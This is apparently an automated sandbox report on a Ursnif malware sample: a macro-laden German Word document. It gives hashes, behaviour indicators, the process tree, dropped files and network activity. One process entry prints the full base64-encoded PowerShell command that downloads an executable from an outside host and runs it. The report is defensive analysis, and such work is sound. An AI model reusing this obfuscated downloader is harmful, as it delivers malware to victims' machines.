analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://www.malware-traffic-analysis.net/2019/11/06/index.html

Full analysis: https://app.any.run/tasks/757fa17e-85be-430d-a1d0-ffa45fc4a97d
Verdict: Malicious activity
Analysis date: May 20, 2022, 23:37:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
maldoc-3
Indicators:
MD5:

38D659641A61C5FB268A5EDB2A3D21D6

SHA1:

9E50EA525FE11669920FE64437B7CB485B33C5E8

SHA256:

6F6F20EB9A9D2ECF8C128790E3DEFB444F7CE39ED80BE9301D5E4692DDD4158D

SSDEEP:

3:N8DSLHXWQfigcWMMLA2ZbIG:2OLHpJYNG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 3368)
      • WINWORD.EXE (PID: 832)
      • WINWORD.EXE (PID: 1292)
    • Drops executable file immediately after starts

      • WinRAR.exe (PID: 3368)
    • Application was dropped or rewritten from another process

      • 2019-11-06-initial-Ursnif-binary-retrieved-by-Word-macro.exe (PID: 3984)
  • SUSPICIOUS

    • Reads Microsoft Outlook installation path

      • iexplore.exe (PID: 3864)
    • Reads default file associations for system extensions

      • WinRAR.exe (PID: 3368)
      • WINWORD.EXE (PID: 832)
    • Reads the computer name

      • WinRAR.exe (PID: 3368)
      • powershell.exe (PID: 3960)
    • Checks supported languages

      • WinRAR.exe (PID: 3368)
      • powershell.exe (PID: 3960)
      • 2019-11-06-initial-Ursnif-binary-retrieved-by-Word-macro.exe (PID: 3984)
    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3368)
      • WINWORD.EXE (PID: 832)
    • Application launched itself

      • WINWORD.EXE (PID: 832)
    • Reads Environment values

      • powershell.exe (PID: 3960)
    • Executed via WMI

      • powershell.exe (PID: 3960)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3368)
    • Executes PowerShell scripts

      • powershell.exe (PID: 3960)
    • Drops a file with a compile date too recent

      • WinRAR.exe (PID: 3368)
  • INFO

    • Reads the computer name

      • iexplore.exe (PID: 3864)
      • iexplore.exe (PID: 2612)
      • WINWORD.EXE (PID: 832)
      • WINWORD.EXE (PID: 1292)
    • Changes internet zones settings

      • iexplore.exe (PID: 2612)
    • Checks supported languages

      • iexplore.exe (PID: 2612)
      • iexplore.exe (PID: 3864)
      • WINWORD.EXE (PID: 832)
      • WINWORD.EXE (PID: 1292)
    • Application launched itself

      • iexplore.exe (PID: 2612)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 2612)
      • iexplore.exe (PID: 3864)
    • Checks Windows Trust Settings

      • iexplore.exe (PID: 3864)
      • iexplore.exe (PID: 2612)
      • powershell.exe (PID: 3960)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3864)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2612)
    • Modifies the phishing filter of IE

      • iexplore.exe (PID: 2612)
    • Changes settings of System certificates

      • iexplore.exe (PID: 2612)
    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 3368)
      • WINWORD.EXE (PID: 1292)
      • WINWORD.EXE (PID: 832)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 832)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
7
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winrar.exe winword.exe no specs winword.exe no specs powershell.exe no specs 2019-11-06-initial-ursnif-binary-retrieved-by-word-macro.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2612"C:\Program Files\Internet Explorer\iexplore.exe" "https://www.malware-traffic-analysis.net/2019/11/06/index.html"C:\Program Files\Internet Explorer\iexplore.exe
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
3864"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:267521 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
3368"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\2019-11-06-malware-and-artifacts-from-Ursnif-infection.zip"C:\Program Files\WinRAR\WinRAR.exe
iexplore.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
832"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3368.6758\2019-11-06-example-of-German-Word-doc-with-macro-for-Ursnif.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
1292"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\gdi32.dll
3960powershell -enco JABNAHEAaAB3AHYAaQBqAHgAPQAnAEoAbQBpAHoAZQBtAGIAbgBzAHoAYgAnADsAJABDAHYAZQByAHoAeABkAHIAaABtAHoAawB1ACAAPQAgACcANQAwADkAJwA7ACQAQgBzAGYAawBrAHMAYgBtAD0AJwBOAHYAcwBzAGwAcQBzAHkAJwA7ACQAVgB4AHMAdwBzAG0AaABlAGUAegBtAGEAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwB2AGUAcgB6AHgAZAByAGgAbQB6AGsAdQArACcALgBlAHgAZQAnADsAJABQAGsAdgBzAGMAYQB4AHgAYgA9ACcAWgB0AGcAdQBkAGMAeQBuACcAOwAkAFEAbwBxAHEAeQB6AHEAZgBtAHkAeQA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBlAFQALgBXAEUAYgBjAGwAaQBFAE4AVAA7ACQASAB2AHIAZgBjAHUAbQB6AHEAPQAnAGgAdAB0AHAAOgAvAC8AZwBvAGUAYQB0AGEAbgB0AGUAdwAuAGMAbwBtAC8AegBlAHAAbwBsAGkALwBpAHIAbwBuAGEAawAuAHAAaABwAD8AbAA9AGcAbwByAGkAZgBmADIALgBjAGEAYgAnAC4AIgBzAGAAUABsAGkAVAAiACgAJwAqACcAKQA7ACQAWABkAGUAbABpAHQAaQBiAGIAZwA9ACcAVABsAHEAdwBuAGkAagB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAHIAbQByAHUAcwBjAHcAcgBwACAAaQBuACAAJABIAHYAcgBmAGMAdQBtAHoAcQApAHsAdAByAHkAewAkAFEAbwBxAHEAeQB6AHEAZgBtAHkAeQAuACIARABvAHcAbgBMAGAAbwBhAGQARgBJAGAAbABFACIAKAAkAFoAcgBtAHIAdQBzAGMAdwByAHAALAAgACQAVgB4AHMAdwBzAG0AaABlAGUAegBtAGEAcAApADsAJABNAGQAbwBjAG0AeABpAG4AdQBsAD0AJwBSAGgAcQBnAHUAZwBvAHYAegBwAHgAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFYAeABzAHcAcwBtAGgAZQBlAHoAbQBhAHAAKQAuACIAbABlAGAATgBnAFQAaAAiACAALQBnAGUAIAAzADkANgAxADEAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQBSAFQAIgAoACQAVgB4AHMAdwBzAG0AaABlAGUAegBtAGEAcAApADsAJABHAHAAcQBkAGYAaABtAHIAYgA9ACcASABsAHQAbwBtAHIAcwBiAHUAJwA7AGIAcgBlAGEAawA7ACQASABvAGMAZwBpAGwAeABnAHMAPQAnAFQAYwB5AGQAaABlAGsAZgBwAHAAagBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAbABjAGYAZAB5AGEAdQA9ACcAQwBhAHkAegBhAHQAdgBlAGMAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3984"C:\Users\admin\AppData\Local\Temp\Rar$EXb3368.8980\2019-11-06-initial-Ursnif-binary-retrieved-by-Word-macro.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb3368.8980\2019-11-06-initial-Ursnif-binary-retrieved-by-Word-macro.exeWinRAR.exe
User:
admin
Company:
ZONE3000Village
Integrity Level:
MEDIUM
Description:
FeltPart3
Version:
4.5.57.28
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb3368.8980\2019-11-06-initial-ursnif-binary-retrieved-by-word-macro.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
Total events
20 549
Read events
20 151
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
22
Text files
29
Unknown types
10

Dropped files

PID
Process
Filename
Type
3864iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2A249A8EAE5FF8B677AA8B178688CF94der
MD5:D71BCC80A7B0FC9612D7B4619FB2C2AE
SHA256:B7C991C3B5997CDA961B68B8D3BF0597BC0A9B4805810FC2AFD1A061DD67953B
3864iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711Eder
MD5:C04F441D0220712231531A90823834DB
SHA256:055641D3987AE98E2DD627D3214EA8084AE773A3DF9592191B86977C752A29E7
3864iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\2019-11-06-malware-and-artifacts-from-Ursnif-infection.zip.adioap2.partialcompressed
MD5:A046B3A8EA7CE7954F24B3C0E98FF390
SHA256:D49053B75AC650271C61E14F71A8B279206218EC9314F0515CBC0DBCF43A284A
2612iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8Fbinary
MD5:D4231DF8CAD887D4FD55DCCDCF1E6F94
SHA256:AA104CF4020BDEA8B7887562A8FEEA1405CCAF0AC3CE1C719C984284E7541B24
3864iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DY534W2X\index[1].htmhtml
MD5:85D69F9CA5B0AC815A200F77815D3A23
SHA256:CF6B587E6B7AB09002EB4148C4311191B0F69AB84C4D03AD7E710BFAD910A995
2612iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\2019-11-06-malware-and-artifacts-from-Ursnif-infection.zipcompressed
MD5:A046B3A8EA7CE7954F24B3C0E98FF390
SHA256:D49053B75AC650271C61E14F71A8B279206218EC9314F0515CBC0DBCF43A284A
3864iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:C6FA54F7975E53D963E18A0F6D3B07DE
SHA256:7C5CD06DA0139761727B4A5C15DB43C67B41E19E2E155E6AE6F890B3E31C21A8
3864iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711Ebinary
MD5:A5FB52375D53A95213A6CC2415C22CA7
SHA256:439F7909BBAE7CD5534A0A86DFBB25AE1B2FE27836A343DB79877CB1B984038B
2612iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\imagestore\f7ruq93\imagestore.datbinary
MD5:370FD9808E8C1854D4593AF4060DA536
SHA256:D329F7BC34B4ADB4AA5E453B5D489446CB49727EE60CD1AB4A146E32341665CD
3864iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850Dder
MD5:93995AD095112907CFC088998C161574
SHA256:FD16D238BCAC3441688E7CA940C27BB02DF8F0BF43B26D8E551414A18748C1CC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
21
DNS requests
12
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2612
iexplore.exe
GET
200
93.184.220.29:80
http://crl3.digicert.com/Omniroot2025.crl
US
der
7.78 Kb
whitelisted
2612
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
der
471 b
whitelisted
3864
iexplore.exe
GET
200
172.64.155.188:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
US
der
471 b
whitelisted
3864
iexplore.exe
GET
200
104.18.32.68:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D
US
der
727 b
whitelisted
3864
iexplore.exe
GET
200
172.64.155.188:80
http://ocsp.sectigo.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECECrsM%2B7Sq5MOuq8mZpDVUKY%3D
US
der
471 b
whitelisted
3864
iexplore.exe
GET
200
8.252.177.126:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?28a000374674e96d
US
compressed
4.70 Kb
whitelisted
3864
iexplore.exe
GET
200
8.252.177.126:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?53acdcc8e58d37ad
US
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3864
iexplore.exe
172.64.155.188:80
ocsp.comodoca.com
US
suspicious
2612
iexplore.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2612
iexplore.exe
199.201.110.204:443
www.malware-traffic-analysis.net
Namecheap, Inc.
US
suspicious
2612
iexplore.exe
13.107.21.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3864
iexplore.exe
104.18.32.68:80
ocsp.comodoca.com
Cloudflare Inc
US
suspicious
2612
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
3864
iexplore.exe
8.252.177.126:80
ctldl.windowsupdate.com
Level 3 Communications, Inc.
US
suspicious
3864
iexplore.exe
199.201.110.204:443
www.malware-traffic-analysis.net
Namecheap, Inc.
US
suspicious
2612
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted

DNS requests

Domain
IP
Reputation
www.malware-traffic-analysis.net
  • 199.201.110.204
malicious
ctldl.windowsupdate.com
  • 8.252.177.126
  • 8.252.73.254
  • 8.252.41.254
  • 8.253.129.204
  • 8.252.191.254
whitelisted
ocsp.comodoca.com
  • 172.64.155.188
  • 104.18.32.68
whitelisted
ocsp.usertrust.com
  • 104.18.32.68
  • 172.64.155.188
whitelisted
ocsp.sectigo.com
  • 172.64.155.188
  • 104.18.32.68
whitelisted
api.bing.com
  • 13.107.5.80
whitelisted
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
crl3.digicert.com
  • 93.184.220.29
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted

Threats

No threats detected
No debug info